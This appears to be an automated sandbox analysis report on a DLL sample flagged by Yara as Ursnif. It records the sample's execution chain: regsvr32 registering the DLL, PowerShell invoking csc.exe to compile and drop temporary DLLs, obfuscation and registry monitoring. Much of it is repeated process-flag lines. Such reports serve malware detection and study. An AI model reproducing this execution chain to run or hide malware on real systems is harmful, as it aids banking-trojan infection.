Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.cmdline'

Contains functionality to dynamically determine API calls

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_10001BAC LoadLibraryA,GetProcAddress,

0_2_10001BAC

Registers a DLL

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\2790000.dll

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002120 push ecx; ret	0_2_10002129
Source: C:\Windows\System32\loaddll32.exe	Code function: 0_2_10002173 push ecx; ret	0_2_10002183
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04642D8B push ecx; ret	3_2_04642D9B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_04629670 push ecx; mov dword ptr [esp], 00000002h	3_2_04629671
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 3_2_046428A0 push ecx; ret	3_2_046428A9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9ABC0 push ecx; ret	7_2_04E9ABC9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_04E9AF6F push ecx; ret	7_2_04E9AF7F

Persistence and Installation Behavior:

Drops PE files

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\xwrbq4ie\xwrbq4ie.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\rzslcw3n\rzslcw3n.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\rpyoew2f\rpyoew2f.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\pkkmtuzt\pkkmtuzt.dll	Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif

Source: Yara match	File source: 00000000.00000003.718768044.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792588340.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.910870766.000000000500C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743986098.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754576282.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886665865.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743884780.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718843741.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921590323.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754698141.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.942431868.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754769459.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921653707.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.866559376.0000000004E6C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.918784964.0000000006548000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887362979.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754654918.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743778425.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792300169.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743828986.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792520115.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718744882.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792349818.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921759909.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.926000939.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744005054.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886778931.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718819209.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743935552.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792420602.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792562195.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754876807.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887204962.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718696614.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.886970529.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718647612.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754836366.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.858457272.000000000564C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000032.00000003.921808684.000002009624C000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.824971303.0000000001CAC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.744015390.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.743688599.0000000005848000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718721890.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887090567.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887042071.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.718792278.0000000001EA8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754897105.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887180889.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.887136487.0000000004318000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792489565.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.792387675.0000000005208000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.754923089.0000000005068000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.940528675.0000000005D38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: rundll32.exe PID: 6632, type: MEMORY
Source: Yara match	File source: Process Memory Space: loaddll32.exe PID: 6560, type: MEMORY

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Windows\System32\loaddll32.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
